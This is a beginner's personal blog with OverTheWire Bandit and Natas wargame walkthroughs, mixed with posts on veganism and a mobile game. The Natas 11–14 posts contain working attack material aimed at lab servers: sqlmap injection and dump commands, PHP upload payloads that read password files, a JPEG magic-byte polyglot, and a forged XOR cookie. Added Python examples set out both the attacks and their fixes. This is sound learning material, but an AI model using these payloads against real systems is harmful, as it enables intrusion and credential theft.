The art of understanding the problem

Hey there,

These days I’m concentrating on improving my hacking skills, because I can’t afford to let this dream of mine stay in my journals; some dreams have to come true. I read, I try to hack some servers (nothing illegal, mum), I blog about my solutions and about the way I search for them, because I’m only a beginner in the field, not an expert, a beginner.

I have always been too suspicious about my abilities. Sometimes I challenge myself in order to show the girl in the mirror that she can; sometimes I ask for an opinion from someone who knows me better than I know myself. I will never take up a task or a job outside my ability scope, so to avoid a situation like that I keep my knowledge of my own skills up to date.

The 5th of November should be marked on my calendar. Today I found out that I’ve finally learnt to understand the problem. As a beginner hacker I would always worry about the solution without even understanding the core problem or the task itself. Today, as I was doing one of the OverTheWire Bandit levels, I had no idea which command should be used; the only thing I knew was that the file contained a human-readable string.

What would a beginner do in this case? Of course, I googled how to find a human-readable string in a file. And there was the solution:

strings somebinaryfile | grep textuwanttofind

Maybe you’ll think: “WTF, nothing serious, you haven’t discovered anything, girl, you just googled it and copy-pasted the solution”. For me this is a relevant point on my learning path, because I finally googled the problem, not the solution.

Before finding that link I read the man pages of strings and grep and learnt some things I had no idea about. Anyway, I learnt the art of reading and understanding the problem, and didn’t worry about the solution.

So, if you are a beginner, here is a good tip: never worry about finding the password of this or that level. Maybe you will never find the password, but the reading, the research you do and the knowledge you gain will help you become the specialist you want to be. Try to understand the main problem of the task and don’t give up until you solve it.

I thought it’s supposed to be easier…

Today I solved Bandit 6 → 10 levels

Hey there,

I had so much fun solving Bandit levels and blogging about them, so I decided to make it a habit and see if I can solve all the levels by the end of the year. Now, without further ado, let’s pick up where we stopped last time.

Bandit Level 5 → 6

Our task is to find the file which is human-readable, 1033 bytes in size and not executable. I assume the command that will help us today is find, so I look at what find is for and what options it has. I found -executable, which is probably one of the tests I need, but I’m still looking for a way to filter by size and to see whether a file is human-readable. There is a -size test, and we should pay attention that for bytes the number needs a c suffix (without it, find counts 512-byte blocks). I found the directory named “inhere”, which contains many subdirectories. In order to save time and not check every directory by hand, I stay in “inhere” and do:

find -size 1033c

It shows me the only file that is 1033 bytes: ./maybehere07/.file2. The size alone was enough to single it out, so I cat the file. There is the password!

Bandit Level 6 → 7

This level seems harder at first sight, because it’s the first time I have to find a file owned by another user. Hard, but not impossible. Let’s dig in. In order to find a file owned by a given user and group I type:

find -user bandit7 -group bandit6

and for the size, as we learnt from the previous level, we add -size 33c. No result. Let’s read the task again: the password is stored somewhere on the server, so we should search everywhere, starting from /:

find / -user bandit7 -group bandit6 -size 33c

Oh no, it shows all the “Permission denied” errors as well. We don’t need them, so let’s redirect standard error (file descriptor 2) to /dev/null:

find / -user bandit7 -group bandit6 -size 33c 2>/dev/null

Success! There is the file we were looking for, and it contains the password for the next level.

Bandit Level 7 → 8

The password is in the file named data.txt, next to the word millionth. I guess I should find out how to search for a word in a file. grep does exactly that: it prints the lines of a file that match a pattern. So I just type:

grep millionth data.txt

This was child’s play.

Bandit Level 8 → 9

The password for the next level is stored in the file data.txt and is the only line of text that occurs only once. The key phrase is “occurs only once”; that sounds like unique, right? What a pleasant coincidence: we have a command called uniq. On the man page of uniq I found this option:

-u, --unique
     only print unique lines

The level’s reading material also mentions the sort command. What does it do? The man page says:

sort - sort lines of text files

It also suggests reading about piping and redirection. After looking through the material I try this:

cat data.txt | sort | uniq -u

And there is our password. Note that uniq only compares adjacent lines, which is why the input has to be sorted first; uniq -u on the unsorted file would print almost everything. Another, more efficient way (without the needless cat) would have been:

sort data.txt | uniq -u

Bandit Level 9 → 10

The password for the next level is stored in the file data.txt, in one of the few human-readable strings, preceded by several = characters. I understand that my task is to pull the human-readable strings out of a binary file and pick the one with the = characters in front of it. strings does the first part and grep the second:

strings data.txt | grep "= "

Success! The password is on my screen already!

For me these levels were easier than the previous ones. Maybe because I’ve already learnt the art of understanding the problem and reading every possible man or --help page.

I thought it’s supposed to be easier…

Happy International Vegan day!

hey there,

I have been following a vegan lifestyle for almost three years, and today I would like to talk about my experience, the pros and cons of being a vegan in Armenia, a country where almost all national dishes are, to put it mildly, not vegan-friendly.

Before saying bye-bye to meat and dairy products, I read hundreds of articles and watched thousands of videos. Most of them would say “it’s not a one-day plan, no one can become vegan in a day, you should start with baby steps, become a vegetarian first, and then see how your body reacts…”. For me it took about a second; there was a kind of click in my head. I was watching a TED talk about food marketing and meat production and I just said “I’m becoming a vegan”. I haven’t eaten meat or drunk non-plant-based milk since that moment.

I was living in Germany at that time and it didn’t feel like a huge step; it was normal there, I wasn’t seen as an alien. I could go to a supermarket, find the vegan section and buy soy milk produced the day before. A week after becoming a vegan I travelled to Amsterdam and found a vegan-friendly store at every corner of the city: vegan cookies, vegan chocolate, vegan sausage? OMG, people!!! I was happy.

Vegan breakfast in Amsterdam

Then I moved back to Armenia. And here all the colors seemed gray, and green was not even mentioned. Eat some dolma (meat wrapped in cabbage), here is some barbecue, enjoy the meat, your body needs protein… And I was kind of seen as someone following a fashion, someone who says she is vegan because that’s a way to show off or pretend she is unique. Frankly, that hurt.

One day Antranig found a store where I could buy soy milk, and that was one of the happiest days of my life. Of course, I’m not the only vegan here in Armenia, but there was not much demand for vegan products, and the milk we bought had been produced three or four months earlier.

Found my first plant based milk in Yerevan

These days it has become much better. I can buy plant based milk in every store, we’ve even found vegan cookies, which I love, most cafes and restaurants have updated their menus, and you can see that little “leaf” sign, which means the dish is vegan friendly. And there are already three vegan cafes (don’t dare to laugh), where you can find every kind of delicious food: pizza, salads, soup and even famous Armenian traditional dishes, like the above mentioned dolma (of course, made with a vegan recipe).

I’ve started to cook more, explored new vegan recipes and found amazing food bloggers. Marianna is from Armenia. She and her husband Garik Papoyan, a famous musician here, have been vegan for about five years, which makes them among the first vegans in the country. I’ve tried Marianna’s vegan omelet recipe and loved it. Another famous vegan food blogger is Pick Up Limes. Saying I love their work and passion would be saying nothing. I tried most of their recipes while living in Germany (sadly, it’s not easy to find all the ingredients here, and buying 100 grams of tofu, for example, costs a fortune).

Vegan homemade cookies

My struggle is not over, unfortunately. People look, they stare, they ask, I explain, they laugh, I smile, they talk, I don’t care. Like every change and every new thing, this needs time for people to adjust. I’ll live to see the day when you don’t have to ask whether they have plant-based milk for the coffee; you’ll be sure they do. Who knows, maybe they’ll even ask: “what kind of milk do you prefer?” John Lennon would say: “You may say I’m a dreamer, but I’m not the only one…”

I thought it’s supposed to be easier…

How I tried to solve OverTheWire – Bandit 0 → 5

hey there,

I had some energy for doing some Bandit levels today and thought it would be nice to share all of them with you. As always, I’m not going to spoil it with passwords; this is just a walkthrough. My coffee is ready, so let’s dig in.
Bandit Level 0

The sole goal of this level is to learn how to connect to another server using ssh. There are four relevant pieces of information: the host name (or IP address), the username, the password and the port number.

For this level our host name is: bandit.labs.overthewire.org
Username: bandit0
Password: bandit0
Port Number: 2220

Let’s connect to the server and log into the game. The syntax is ssh username@hostname -p portnumber, so here:

ssh bandit0@bandit.labs.overthewire.org -p 2220

If you’ve done it right, you’ll be asked for a password, and you just have to type bandit0.
Enjoy your stay!

Bandit Level 0 → 1

For this level you should learn some Unix commands, especially ls and cat. For me, as a beginner, the most important thing in Unix is the --help option. So, as always, I just type ls --help and it tells me the usage and that ls lists information about files. There is only one file, named “readme”. For reading a file we need the cat command, which (cat --help tells us) concatenates files and prints them to standard output; with a single file it simply prints that file. I love how every command is kind of an abbreviation. Now you just need to type cat and the name of the file you want to read. Wow! Here is our password. OK, that was easy, let’s jump to the next level.

A quick tip before passing to level 2: always save the passwords on a sticky note.

Bandit Level 1 → 2

After connecting to this server the same way as on bandit0, we list the files (ls) and see there is a file named “-“. Let’s try to cat the file the way we already know. Nothing happens; it waits for input, because a lone - tells cat to read from standard input instead of a file. First of all press Ctrl + C to get out of that madness. cat --help gives us nothing, sad… OK, let’s google it, because (another wise thought alert) if you have a problem, it means somewhere in the world someone has had that problem as well, and most probably there is a solution for it. I found this.

Problem is solved: the file has to be named by a path rather than a bare dash, i.e. with the current directory in front of it, ./-. We have the password for the next level. Saaaaaavviiiing it and going to the next level.

Bandit Level 2 → 3

Hah! This is fun. We have a file that is literally named “spaces in this filename”. There should be a way to help the shell understand that “spaces in this filename” is one file, not four.

-Hello Google, how to cat a file that has spaces in the name

-Hello coffee, here are about 20,100,000 results (0.57 seconds)

-You are such a show-off, but thanks

So it turned out you need quoting, AKA wrapping the name in ‘ ‘ (or escaping each space with a backslash).
Level 3 was not hard at all either.

Bandit Level 3 → 4

Yey! This one is kind of tricky. After listing the files we find a directory. Here we need a new command named cd (change the shell’s working directory). Awesome, right? We try to list the files in this directory and there is nothing but emptiness. C’mon, you promised; even the name of the directory says “inhere”. What if the file is hidden? How do we list hidden files? We need help, no, actually we need THE help. ls -a will list all the files, even the ones that start with a ., AKA the hidden files. .hidden is found, what are you waiting for?

Bandit Level 4 → 5

What do I see? Again an “inhere” directory, which has not one, not two but ten files. Sure, I could read all of them and look for the password, but something inside me says: “There should be a way to cat all the files, go and find it”. Here I found a part of our problem, i.e. how to cat all the files: we need the “*” wildcard. But let’s pay attention: all the files start with a “-“, so they have to be given as ./* to stop cat from treating their names as options. Typing cat ./* dumps all ten files at once. How do I find the password in this symbol mixture? I tried reading through it by eye. No way, most of it is binary garbage. Keeping up with the Kardashians, I mean Google. What if we find out which file contains text and then just read that one? That is possible with the file command: file ./* tells us that only the file named -file07 contains ASCII text. Let’s read that one.

Aaaand done!

I thought it’s supposed to be easier…

OverTheWire – Natas 14


an experiment

 hey, 

most probably you have already heard that success is nothing but the result of ongoing hard work and patience. I have heard, read and said this thousands of times, but either my laziness or my lack of patience had never let me see or feel it on my own.

This year in March I got my first iPhone. I used to be “an Android girl”, and I was pretty sure that iOS would never be a part of my life. Yet I’m studying iOS development now. Anyway, after installing all the necessary software on the new phone I installed a game, a really fun one: Fishdom by Playrix. I was kind of hooked on it and could play for hours, until I couldn’t feel my fingers. The concept is lovely: you buy fish, you feed them, you design their aquarium, and you play more, buy more, discover new worlds and new aquariums. Some levels are terribly hard; I could be stuck on the same level for days and go crazy, but I always kept trying, and not one level was unbeatable.

Yesterday, for the first time in these eight months, I came first in the gold league. That meant something to me, so please laugh, but not so loudly.

You know I’m always looking for something between the lines. So here, this game came as proof that if you are devoted, if you keep struggling, if you try hard, one day you’ll collect enough marbles and you’ll be the first.

I thought it’s supposed to be easier…

go hack yourself

 hey there, 

so I got this pin (btw sent from Defcon) and I loved it. 

for me hacking is not only about looking for a vulnerability and cracking the system. mostly I see it as the most creative way you can approach a problem: thinking differently, finding the point that is not meant to be found, acting unexpectedly. and what’s the point of these actions? at least for me, the only goal is improving the security of the system you are about to hack.

I caught myself thinking that all my life I’ve brought myself to the point of being cracked, to find my vulnerable side in order to improve it and make myself more secure; I’ve put myself in situations I’m not ready for at all, to see how I react. for me that’s the only way to self-awareness, along with meditation and yoga, of course.

so, maybe you’ll see a pun here and a swear word; meanwhile this is not offensive at all (pun intended). it can be understood as a motto about knowing yourself and hacking your mind.

go hack yourself

I can’t believe I solved OverTheWire – Natas level 14

hey you!

I love the Natas people! I’ll tell you why a bit later. open the source code. it says: if(mysql_num_rows(mysql_query($query, $link)) > 0) { and many other lines. I didn’t even pay attention to those. I got what I needed: MySQL, and a query whose row count decides whether you are logged in!!!

twenty minutes ago I had no idea about SQL. I had only heard about it while going through some books on web application pentesting. so my gut told me: “c’mon, go and learn what it is after all”. this tutorial was more than enough for this level.

what I did was assume the username should be natas15 and try to log in. oh, my lovely Burp Suite. intercept is on 🙂 here is what we find:

POST /index.php HTTP/1.1
Host: natas14.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://natas14.natas.labs.overthewire.org
Authorization: Basic bmF0YXMxNDpMZzk2TTEwVGRmYVB5VkJrSmRqeW1ibGxRNUw2cWRsMQ==
Connection: close
Referer: http://natas14.natas.labs.overthewire.org/
Cookie: __utma=176859643.2101260650.1648221880.1648222577.1648226688.3; __utmz=176859643.1648222577.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)
Upgrade-Insecure-Requests: 1

username=natas15&password=testpassword
I just copy-pasted this into a new file called natas15. the rest is up to sqlmap; here we type:
sqlmap -r natas15 -p username
and then say “yes” to every question: y, y, y, y… for more info we add --dump: sqlmap -r natas15 -p username --dump and run again. here comes the sun fun.
don’t get disappointed if the username natas15 doesn’t work. try the others as well. hey, you obviously know how to use sqlmap. <3
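As an added example (not the post’s own code, and not the level’s real query, which the post does not reproduce): a Python sqlite3 model of the bug sqlmap found, with the string-built query beside the parameterised fix. It assumes the query wraps the two form fields in single quotes; the level’s actual quoting may differ, which is exactly why sqlmap tries several payload shapes. The users table is constructed for the example.

```python
import sqlite3
from typing import Dict, List, Tuple

# Constructed sample table; the real Natas database is not on the page.
SAMPLE_USERS: List[Tuple[str, str]] = [
    ("natas15", "not-the-real-password"),
    ("alice", "hunter2"),
]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return con


def vulnerable_login(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Assumed shape of the level's $query: the form fields are pasted
    straight into the SQL text. The page only shows the
    mysql_num_rows(...) > 0 test, reproduced here as
    'any matching row means logged in'."""
    query = (
        "SELECT * FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    return len(con.execute(query).fetchall()) > 0


def safe_login(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised version: user input never becomes part of the SQL text,
    so quotes and comment markers in it are just data."""
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return len(con.execute(query, (username, password)).fetchall()) > 0


# The payload goes in the username field, the one the post points sqlmap at
# with -p username. The closing quote ends the string literal, OR 1=1 makes
# every row match, and -- comments out the password check that follows.
PAYLOAD_USERNAME = "natas15' OR 1=1 -- "


def demo() -> Dict[str, bool]:
    con = make_db()
    return {
        "correct creds, vulnerable": vulnerable_login(con, "natas15", "not-the-real-password"),
        "injected, vulnerable": vulnerable_login(con, PAYLOAD_USERNAME, "anything"),
        "injected, safe": safe_login(con, PAYLOAD_USERNAME, "anything"),
        "correct creds, safe": safe_login(con, "natas15", "not-the-real-password"),
    }


if __name__ == "__main__":
    for case, logged_in in demo().items():
        print(f"{case}: {'logged in' if logged_in else 'rejected'}")
```

The injected username logs in without knowing any password in the vulnerable version and is rejected by the parameterised one, while real credentials work in both; that row-count-only check is why a blind, boolean-based tool like sqlmap can then pull the whole table out one true/false answer at a time.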
I thought it’s supposed to be easier… 

OverTheWire – Natas level 13 was not that hard

hey there,

people learn from their mistakes, and so does Natas. They have heard that instead of a .jpg we were able to upload any file, so they made some changes and “improved” their security for this level. have they even heard about magic numbers? today they are going to do their magic for us.

first open your terminal and hexdump any .jpg file. I just found this cutie on my laptop, so let’s see how .jpg files differ from the others. I’m going to type: xxd nameofthephoto.jpg | head -n 1 (hexdump -C nameofthephoto.jpg works just as well)

pay attention to the first bytes of the hexdump: ffd8 ffe0 00
these are the magic numbers for .jpg (every JPEG starts with ff d8 ff; ff e0 is the JFIF marker that usually follows), and they are here for us today. we can convince the server that the file we are uploading is a pure .jpg, as it wishes. (ssshhh, don’t tell anyone, we are going to upload a wonderful .php that will lead us to our password)
do you remember the script (natas12.php) that we wrote together for the last level? bring it back, we need it today as well, saved as natas13.php. you have to make one change though, the file it reads:

<?php
echo file_get_contents("/etc/natas_webpass/natas14");
?>

and now let’s make a .jpg file that contains just the magic numbers:

echo -e "\xff\xd8\xff\xe0\n" > newfile.jpg

then we append the script to it, so the PHP comes right after the magic numbers:

cat natas13.php >> newfile.jpg

the rest is the same: upload the file, change the name to .php in the intercepted request (now you like Burp Suite more, right?) and enjoy the moment. come back for the next level.

I thought it’s supposed to be easier…

Today I solved OverTheWire – Natas level 12

hey there, 

the older we get, the harder life is. here in OverTheWire it’s a bit different: level 12 is much easier if you’ve already passed the other 11 levels. (Good for you, by the way! what a journey, huh?!)

have you already read the script? actually, there is nothing new for us; the page tells us the same thing: you should upload a .jpg file not bigger than 1KB. let’s try it.

before that, do you have Burp Suite? you’re going to need it. I should confess, at first I hated it. now it’s one of my best friends. please download it and come back… I’ll wait. if you have it already, you need to know how it works, right? Here I’ve found a tutorial for you to be quick, but I learned it in about 5 hours with this crazy guy.

I made a random .txt file and tried to upload it, to see what happens when you don’t upload the required .jpg.

Have you noticed? it has renamed it to .jpg. Let’s see if we can change that back to .txt, and then click on the uploaded file:

voila! it serves the text file. this is so bad… so bad… this is my friend, the unrestricted file upload: the server stores whatever we send, under a name we control. what if we create a PHP file, since we know the server runs PHP? no worries, this is going to be easy, you just need one function: file_get_contents, and we already know where the password is: /etc/natas_webpass/natas13. it should look like this:

<?php
echo file_get_contents("/etc/natas_webpass/natas13");
?>

save the file as natas12.php and upload it. then go back to your close friend Burp Suite, change the .jpg into .php in the intercepted request and click Forward. what do you think will happen if you open the uploaded file? do it yourself, I trust you! see you on the next level.
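An added Python example (not the author’s commands) covering both the level 12 rename trick above and the level 13 magic-number trick earlier on this page. It builds the same polyglot that echo -e and cat produce, shows that a leading-bytes check accepts it, and puts beside it a stricter server-side validator that walks the JPEG segment chain (which rejects this polyglot) and picks the stored filename itself, so a .php rename via Burp has nothing to bite on. The PHP payload and the minimal JPEG header bytes are constructed for the example; the two handler functions are hypothetical, not Natas code.

```python
import secrets
from typing import Optional

# Constructed payload: the same idea as the page's natas13.php, embedded here
# so the example runs offline.
PHP_PAYLOAD = b'<?php echo file_get_contents("/etc/natas_webpass/natas14"); ?>\n'

# Constructed minimal but structurally valid JPEG: SOI, one APP0/JFIF segment
# (length 16 = 2 length bytes + 14 payload bytes), EOI. Not a decodable
# picture, just a well-formed marker chain.
MINIMAL_JPEG = (
    b"\xff\xd8"                                            # SOI
    + b"\xff\xe0" + (16).to_bytes(2, "big")                # APP0 + length
    + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"      # JFIF payload
    + b"\xff\xd9"                                          # EOI
)


def build_polyglot(php_source: bytes) -> bytes:
    """Same bytes as: echo -e "\\xff\\xd8\\xff\\xe0\\n" > f.jpg; cat x.php >> f.jpg"""
    return b"\xff\xd8\xff\xe0\n" + php_source


def has_jpeg_magic(data: bytes) -> bool:
    """The leading-bytes check level 13 adds: every JPEG starts ff d8 ff."""
    return data[:3] == b"\xff\xd8\xff"


def jpeg_segments_well_formed(data: bytes) -> bool:
    """Walk marker/length pairs after SOI until SOS or EOI.

    The page's polyglot fails here: after ff d8 ff e0 the two 'length' bytes
    are the newline and the '<' of the PHP tag (0x0a3c = 2620), which point
    far past the end of the file."""
    if not has_jpeg_magic(data):
        return False
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF or data[pos + 1] in (0x00, 0xFF):
            return False
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):          # EOI, or SOS (entropy data follows)
            return True
        if pos + 4 > len(data):
            return False
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        if length < 2 or pos + 2 + length > len(data):
            return False
        pos += 2 + length
    return False


def natas_style_handler(client_target_name: str, data: bytes) -> Optional[str]:
    """Hypothetical model of the level 13 behaviour: magic bytes only, and the
    stored name (hence the extension PHP will execute) comes from a
    client-controlled request field."""
    if not has_jpeg_magic(data):
        return None
    return client_target_name


def hardened_handler(data: bytes, max_size: int = 1024) -> Optional[str]:
    """Hypothetical fix: validate structure, cap size, and let the server
    choose name and extension, so a renamed .php never reaches the
    interpreter."""
    if len(data) > max_size or not jpeg_segments_well_formed(data):
        return None
    return f"{secrets.token_hex(16)}.jpg"


if __name__ == "__main__":
    poly = build_polyglot(PHP_PAYLOAD)
    print("natas-style stores polyglot as:", natas_style_handler("shell.php", poly))
    print("hardened stores polyglot as:", hardened_handler(poly))
    print("hardened stores minimal jpeg as:", hardened_handler(MINIMAL_JPEG))
```

The structural walk is a real improvement over the magic-number check, but it is not the defense: PHP inside a correctly sized COM or APPn segment would still pass it. What actually closes both levels is that the client never chooses the stored name or extension and uploads are never served from a location where the interpreter runs.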
 
I thought it’s supposed to be easier…

How I suffered to hack OverTheWire – Natas level 11

hey there,

so you have already passed all the previous levels, congrats, you are good to go! it gets a bit more complicated from now on. No worries! I’m here to make it easier for you. Now we are on level 11, and I hope you have the password.

What do we see here?

you already know what to do, right? let’s see what the source code says:

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
        $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

the $defaultdata array contains two values: showpassword and bgcolor. (you do see that “no”, don’t you? we are going to change that to “yes”)
what is on the next line? xor_encrypt? what new hell is this? let me explain: XOR encryption is like two salads with one shared ingredient, the key. in both cases (encryption and decryption) the key stays the same, because XORing a byte twice with the same key byte gives the original back. if the plaintext has the same length as the key, the key is used once; if not, the key is repeated. here I’ve found a very simple explanation of the concept for you.
now that we know what XOR encryption means, let’s go on and look at the rest of the source code.
function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
        $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
        if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
            if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
                $mydata['showpassword'] = $tempdata['showpassword'];
                $mydata['bgcolor'] = $tempdata['bgcolor'];
            }
        }
    }
    return $mydata;
}
what does it say? look at the 5th line.
$tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE[“data”])), true);
hah! a cookie? So we must pay attention to the cookies; there should be something there for us.


"Cookies are protected with XOR encryption" says the page. not only that: if you've paid attention, $tempdata goes through three functions, applied from the inside out: base64_decode first, then xor_encrypt, then json_decode. So we undo them in that same order, starting with base64.

1) base64-decode our favourite cookie value (base64 -d)
2) in order to XOR it against the known plaintext we need it as hex, so
3) base64 -d | xxd -p
note: you’ll see %3D at the end of the cookie, which is URL encoding for =, so replace that part with = before decoding.
the result should look like this:
4) now we have the output of xor_encrypt, and we need the plaintext in order to find the key (ciphertext XOR plaintext gives the key stream).
here comes some PHP coding copy-pasting (don’t worry if you can’t code in PHP; remember, you just need to understand what’s written there)
just create a php file and type or copy-paste the following.

<?php

$in = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

print(json_encode($in));

?>

the output is going to be our plaintext, the input of the XOR:

{"showpassword":"no","bgcolor":"#ffffff"}

the world is full of encrypting-decrypting websites. here is one:
voila! XORing the decoded cookie with the plaintext gives us the key stream: qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq
if you remember, I already told you that when the key is short it is repeated, so the actual key is: qw8J
our crazy mind says: go and copy some other code out there. go back to your php file and do some edits: change the “no” into a very nice “yes”, add the xor_encrypt function from the level’s source code with $key = 'qw8J', and print the base64 of xor_encrypt(json_encode($in)).
execute the file, and you will see a whole new cookie:

ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK

what is required is to replace the previous cookie value with this new, much better one. (add %3D at the end only if your base64 output ends with a = padding character; this one does not, since its 42-byte input is a multiple of 3.) the rest is up to you! enjoy the moment of seeing the password on your screen. you deserve it!
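The key recovery and cookie forging described in this post, as an added Python example (not the post’s own PHP, and not the website it used). It builds a sample cookie from the key qw8J the post found, then does the known-plaintext step (ciphertext XOR plaintext) to get the key stream back, collapses it to its shortest repeating unit and forges the showpassword=yes cookie. The “no” JSON and the key are taken from the page; the sample cookie it starts from is constructed rather than fetched.

```python
import base64
import json
from itertools import cycle
from typing import Tuple

# Plaintext the server XORs before base64-encoding the cookie. The page shows
# this JSON comes from $defaultdata, so it is known to the attacker.
DEFAULT_DATA = {"showpassword": "no", "bgcolor": "#ffffff"}

# The key the post recovered; used here only to build a sample ciphertext so
# the example runs offline (assumption: no live cookie is fetched).
SAMPLE_KEY = b"qw8J"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same operation as the PHP xor_encrypt() above."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def php_json(d: dict) -> bytes:
    """Match PHP json_encode(): no spaces around : or , and keys in order."""
    return json.dumps(d, separators=(",", ":")).encode()


def recover_keystream(cookie_b64: str, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: C = P xor K, so K = C xor P."""
    ciphertext = base64.b64decode(cookie_b64)
    return xor_bytes(ciphertext, known_plaintext)


def shortest_period(keystream: bytes) -> bytes:
    """Collapse a repeating key stream to its shortest repeating unit."""
    for n in range(1, len(keystream) + 1):
        if all(keystream[i] == keystream[i % n] for i in range(len(keystream))):
            return keystream[:n]
    return keystream


def forge_cookie(key: bytes, data: dict) -> str:
    """base64(xor_encrypt(json_encode(data))), the inverse of loadData()."""
    return base64.b64encode(xor_bytes(php_json(data), key)).decode()


def demo() -> Tuple[bytes, str]:
    # Build a cookie the way the server would (constructed sample).
    original_cookie = forge_cookie(SAMPLE_KEY, DEFAULT_DATA)
    keystream = recover_keystream(original_cookie, php_json(DEFAULT_DATA))
    key = shortest_period(keystream)
    forged = forge_cookie(key, {**DEFAULT_DATA, "showpassword": "yes"})
    return key, forged


if __name__ == "__main__":
    key, forged = demo()
    print("recovered key:", key.decode())
    print("forged cookie:", forged)
```

Two things worth noticing when you run it: the forged JSON is 42 bytes, so its base64 carries no = padding (the original “no” version is 41 bytes and does), and the forgery works at all only because the scheme has no integrity check; a cookie protected by an HMAC over the ciphertext would reject the edited value no matter how the key was obtained.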

I thought it’s supposed to be easier…